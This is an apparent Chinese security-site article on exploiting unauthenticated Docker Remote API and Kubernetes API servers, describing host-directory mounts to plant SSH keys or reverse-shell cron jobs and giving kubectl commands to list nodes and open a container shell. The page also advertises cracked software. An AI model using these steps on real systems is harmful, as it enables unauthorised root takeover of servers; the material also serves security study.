ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → Docker 漏洞与利用

Docker 漏洞与利用

时间:2018-02-27 19:22:42人气:作者:本站作者我要评论

Docker攻击树

Docker 漏洞与利用

Docker渗透案例

Docker remote api漏洞利用条件:

1.Docker remote api无认证且对外开放

2.使用root用户启动docker

3.允许对宿主任意磁盘/目录进行读写 利用方法: 启动一个容器,挂载宿主机的/root/目录,之后将攻击者的ssh公钥 ~/.ssh/id_rsa.pub的内容写到入宿主机的/root/.ssh/authorized_keys文件中,之 后就可以用root账户直接登录了 启动一个容器,挂载宿主机的/etc/目录,之后将反弹shell的脚本写入到 /etc/crontab中,攻击者会得到一个反弹的shell。

第2种利用方法也可以挂载 /var/spool/cron/目录,将反弹shell的脚本写入到/var/spool/cron/root(centos 系统)或/var/spool/cron/crontabs/root(ubuntu系统)

kubernets api未授权漏洞导致node宿主沦陷:

{ "paths": [ "/api", "/api/v1", "/apis", "/apis/extensions", "/apis/extensions/v1beta1", "/healthz", "/healthz/ping", "/logs/", "/metrics", "/resetMetrics", "/swagger-ui/", "/swaggerapi/", "/ui/", "/version" ] }

获得所有节点 > kubectl -s http://1.2.3.4:8080/ get nodes // 获得所有容器 > kubectl -s http://1.2.3.4:8080/ get pods -all-namespaces=true // 在 myapp 容器获得一个交互式 shell > kubectl -s http://1.2.3.4:8080/ -namespace=default exec -it myapp bash 如果可以控制容器的运行,我们也可以尝试获取 宿主机(即 nodes)的权限。 参考 Docker Remote API 未授权访问漏洞利用,流程大体为 创建新的容器 -> 挂载宿主机目录 -> 写 /etc/crontab 定时任务反弹 shell。

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网